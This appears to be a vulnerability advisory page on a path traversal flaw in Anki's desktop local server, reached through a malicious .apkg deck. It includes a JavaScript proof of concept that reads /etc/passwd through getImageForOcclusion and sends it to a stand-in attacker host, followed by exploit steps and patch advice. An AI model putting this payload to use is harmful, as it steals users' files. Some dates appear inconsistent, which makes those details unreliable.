Listen to this Post
How the Mentioned CVE Works
Anki’s desktop interface relies on a local HTTP server that serves media files and renders web-based content such as cards and editor views. This server listens on localhost and exposes an internal API that the Rust backend uses to communicate with webviews. To prevent untrusted scripts running inside the reviewer or editor from accessing this API, Anki implemented a security measure that blocks direct script access.
However, this protection does not extend to scripts loaded via iframes embedded in the editor. An attacker can craft a malicious `.apkg` deck that includes an HTML or SVG file containing an iframe. When the user imports this deck and views the card, the iframe’s script executes in the context of the editor webview and gains access to the internal localhost API.
While only a limited set of API methods are exposed, one critical endpoint—getImageForOcclusion—allows the attacker to read arbitrary files from the filesystem. By supplying a path traversal payload (e.g., ../../../../etc/passwd), the attacker can read any file accessible to the Anki process.
Once the file content is read, the script can exfiltrate it over the network by making an outbound HTTP request to an attacker-controlled server. No special configuration is required on the victim’s side; simply importing and viewing a card from an untrusted deck is sufficient to trigger the vulnerability.
The vulnerability affects all desktop platforms—Windows, macOS, and Linux—and the severity varies by browser due to Private Network Access (PNA) restrictions: Chrome/Chromium offers the most protection, Safari has partial OS-level protections, and Firefox is the most vulnerable.
CWE: CWE-22 (Path Traversal)
Reporter: Bankde (Eakasit)
DailyCVE Form:
Platform: aqt (PyPI)
Version: <= 25.09.3
Vulnerability: Path Traversal
Severity: Medium (CVSS 6.5)
date: 2026-06-19
Prediction: 2026-05-08 (patched)
What Undercode Say: Analytics
Root Cause Analysis:
The vulnerability stems from insufficient validation of the `Origin` header combined with a failure to restrict path traversal sequences in the `getImageForOcclusion` endpoint. The local HTTP server does not properly sanitize file paths before serving them, allowing `../` sequences to escape the intended media directory.
Affected Endpoint:
POST /_anki/getImageForOcclusion
Example Path Traversal Payload:
// Malicious iframe script inside an imported deck
fetch('http://localhost:8765/_anki/getImageForOcclusion', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ path: '../../../../etc/passwd' })
})
.then(res => res.text())
.then(data => {
// Exfiltrate to attacker server
fetch('https://attacker.com/exfil', {
method: 'POST',
body: data
});
});
Anki Internal API Reference (mediasrv.py):
qt/aqt/mediasrv.py::_handle_local_file_request The vulnerable endpoint did not properly sanitize '..' sequences Patch in 25.09.4 adds path validation to prevent directory traversal
Exploit:
To exploit this vulnerability, an attacker must:
- Create a malicious `.apkg` file containing an HTML or SVG card with an embedded iframe.
- The iframe loads a script that targets the internal localhost API endpoint
getImageForOcclusion. - The script supplies a path traversal string (e.g., `../../../../etc/passwd` on Linux or `..\..\Windows\win.ini` on Windows) to read arbitrary files.
- The script exfiltrates the file content to an attacker-controlled server over HTTP.
Exploit Requirements:
- Victim imports the malicious `.apkg` file.
- Victim views the crafted card in the Anki reviewer/editor.
- No user interaction beyond viewing the card is required.
Browser-Specific Considerations:
- Firefox: Most vulnerable—no PNA implementation.
- Safari: Partial protection via macOS OS-level restrictions.
- Chrome/Chromium: PNA restrictions limit localhost access.
Protection:
Official Patch:
- Upgrade to Anki 25.09.4 or later.
- Available via `Tools > Upgrade/Downgrade` inside Anki.
Workarounds (if unable to patch immediately):
- Do not import `.apkg` files from untrusted sources.
- Inspect `.apkg` contents (it is a ZIP archive) for `.html` or `.svg` files containing `
Manage ConsentTo provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.
We do not sell your personal data. If you wish to exercise your rights under applicable privacy laws, please visit our Do Not Sell My Personal Information page.
Functional Always activeThe technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.PreferencesThe technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.StatisticsThe technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.MarketingThe technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.